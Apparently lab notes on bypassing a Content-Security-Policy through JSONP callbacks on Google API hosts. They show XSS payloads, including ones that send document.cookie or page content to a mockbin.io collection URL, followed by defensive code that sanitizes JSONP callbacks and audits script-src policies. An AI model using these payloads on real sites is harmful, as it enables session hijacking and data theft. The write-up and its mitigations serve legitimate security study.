CSP - JSONP

Initial Attempt

<script src="https://www.google.com/complete/search?client=chrome&q=hello&callback=alert`1`"></script>

Problem: the callback argument cannot be controlled easily on this endpoint

Achieve XSS by using one of the googleapis payloads from JSONBee

<script src="https://translate.googleapis.com/$discovery/rest?version=v3&callback=alert('xss');"></script>

Solution

Achieve redirection by defining your own function in the callback parameter

<script src="https://translate.googleapis.com/$discovery/rest?version=v3&callback=(function exploit(){window.top.location.href='https://google.com'})()"></script>
<script src="https://translate.googleapis.com/$discovery/rest?version=v3&callback=(function exploit(){window.top.location.href='https://b5e02d613ca44b7384e0290125a1448e.api.mockbin.io/?'.concat(document.cookie)})()"></script>
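The redirection above works only because the endpoint echoes the callback parameter into the script body unchanged, so an IIFE in that parameter runs under a whitelisted origin. The following is an added example of the server-side fix, not code from the notes or from any Google service: a JSONP handler that accepts a plain (optionally dotted) identifier as the callback name and rejects everything else. The handler, its limits and the response shape are assumptions for illustration.

```javascript
// Added example: hardening a JSONP endpoint against callback injection.
// A JSONP callback only ever needs to be an identifier such as
// `handleResult` or `App.handlers.onSearch`; anything else is rejected.
const CALLBACK_RE = /^[A-Za-z_$][A-Za-z0-9_$]*(\.[A-Za-z_$][A-Za-z0-9_$]*)*$/;
const MAX_CALLBACK_LENGTH = 64; // assumed limit; long names are a sign of injection attempts

// Returns the callback name if it is safe to embed in a script body, otherwise null.
function sanitizeCallback(name) {
  if (typeof name !== 'string') return null;
  if (name.length === 0 || name.length > MAX_CALLBACK_LENGTH) return null;
  return CALLBACK_RE.test(name) ? name : null;
}

// Builds the HTTP response for a JSONP request (plain object, framework-agnostic).
// `data` is JSON-serialised; U+2028/U+2029 are escaped because they are line
// terminators in JavaScript source even though JSON permits them literally.
function renderJsonp(callbackName, data) {
  const cb = sanitizeCallback(callbackName);
  if (cb === null) {
    return {
      status: 400,
      headers: { 'Content-Type': 'application/json; charset=utf-8' },
      body: JSON.stringify({ error: 'invalid callback' }),
    };
  }
  const json = JSON.stringify(data)
    .replace(/\u2028/g, '\\u2028')
    .replace(/\u2029/g, '\\u2029');
  return {
    status: 200,
    headers: {
      'Content-Type': 'application/javascript; charset=utf-8',
      'X-Content-Type-Options': 'nosniff',
    },
    // The leading comment keeps attacker-chosen bytes away from the start of the
    // response body; the typeof guard makes a missing callback fail quietly.
    body: `/**/typeof ${cb}==='function'&&${cb}(${json});`,
  };
}

// Constructed callback values: one legitimate, three taken from the payload
// shapes in these notes. Only the first survives sanitisation.
const SAMPLE_CALLBACKS = [
  'handleResult',
  'alert`1`',
  "alert('xss');",
  "(function exploit(){window.top.location.href='https://google.com'})()",
];

for (const c of SAMPLE_CALLBACKS) {
  console.log(JSON.stringify(c), '->', sanitizeCallback(c));
}
```

The check is deliberately an allow-list on the name, not an attempt to strip dangerous characters: the endpoint never needs to evaluate anything but a function reference, so there is nothing to escape.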

Problem: the goal is to exfiltrate the page content, not the cookie

<script src="https://translate.googleapis.com/$discovery/rest?version=v3&callback=(function exploit(){var p=document.getElementsByTagName('p')[0];window.top.location.href='https://b5e02d613ca44b7384e0290125a1448e.api.mockbin.io/?'.concat(p)})()"></script>

Problem: the script runs, but the endpoint returns a 400 INVALID_ARGUMENT error when .innerText is appended to read the page content
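Every payload in these notes depends on the same policy weakness: script-src whitelists an origin that also serves JSONP endpoints, and a whitelisted origin is trusted for whatever it returns. The following is an added example of how to catch that when reviewing a policy, not code from the notes: a small auditor that parses the Content-Security-Policy header, checks each script-src host source (including `*.` wildcards and bare scheme sources) against a list of JSONP-serving hosts, and treats a nonce-based policy with 'strict-dynamic' as not affected, since browsers then ignore the host list. The JSONP host list is an assumption seeded with the two hosts used above; in practice it would be maintained from a source such as JSONBee.

```javascript
// Added example: auditing the script-src directive of a CSP header for
// host sources that expose JSONP endpoints (and so bypass the policy).

// Assumed list of JSONP-serving hosts, seeded from the notes above.
const JSONP_HOSTS = ['www.google.com', 'translate.googleapis.com'];

// Parses a CSP header into a Map of directive name -> array of source expressions.
function parseCsp(header) {
  const directives = new Map();
  for (const part of header.split(';')) {
    const tokens = part.trim().split(/\s+/).filter(Boolean);
    if (tokens.length === 0) continue;
    const [name, ...sources] = tokens;
    directives.set(name.toLowerCase(), sources);
  }
  return directives;
}

// True if a host-source or scheme-source expression would permit loading
// a script from `host` (scheme, port and path are ignored for the host match).
function hostSourceMatches(source, host) {
  if (/^[a-z][a-z0-9+.-]*:$/i.test(source)) return true; // scheme source such as "https:" allows any host
  let h = source.replace(/^[a-z][a-z0-9+.-]*:\/\//i, '');  // strip scheme
  h = h.split('/')[0].split(':')[0].toLowerCase();          // strip path and port
  if (h === '*') return true;
  if (h.startsWith('*.')) {
    const suffix = h.slice(1); // "*.googleapis.com" -> ".googleapis.com"
    return host.endsWith(suffix) && host.length > suffix.length;
  }
  return h === host;
}

// Returns a list of findings; an empty list means this check found no JSONP exposure.
function auditScriptSrc(header) {
  const csp = parseCsp(header);
  const sources = csp.get('script-src') || csp.get('default-src');
  if (!sources) return ['no script-src or default-src: script loading is unrestricted'];
  const findings = [];
  const keywords = sources.filter((s) => s.startsWith("'"));
  const hosts = sources.filter((s) => !s.startsWith("'"));
  const hasNonceOrHash = keywords.some((s) => /^'(nonce|sha(256|384|512))-/.test(s));
  // With 'strict-dynamic' browsers ignore host and scheme sources entirely,
  // so a JSONP host in the list no longer matters.
  if (keywords.includes("'strict-dynamic'")) {
    if (!hasNonceOrHash) findings.push("'strict-dynamic' without a nonce or hash blocks all scripts");
    return findings;
  }
  if (keywords.includes("'unsafe-inline'") && !hasNonceOrHash) {
    findings.push("'unsafe-inline' allows inline script");
  }
  for (const src of hosts) {
    for (const jsonpHost of JSONP_HOSTS) {
      if (hostSourceMatches(src, jsonpHost)) {
        findings.push(`${src} permits JSONP host ${jsonpHost}`);
      }
    }
  }
  return findings;
}

// Constructed policies: the weak shape that the notes bypass, and a nonce-based one.
const WEAK_POLICY = "default-src 'self'; script-src 'self' https://www.google.com https://*.googleapis.com";
const STRONG_POLICY = "script-src 'nonce-r4nd0m' 'strict-dynamic' https:; object-src 'none'";

console.log('weak:', auditScriptSrc(WEAK_POLICY));
console.log('strong:', auditScriptSrc(STRONG_POLICY));
```

The auditor only tells you that a listed host is known to serve JSONP; it cannot prove a host that is absent from its list is safe, which is the reason the nonce plus 'strict-dynamic' form is the recommended fix rather than a longer block list.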

References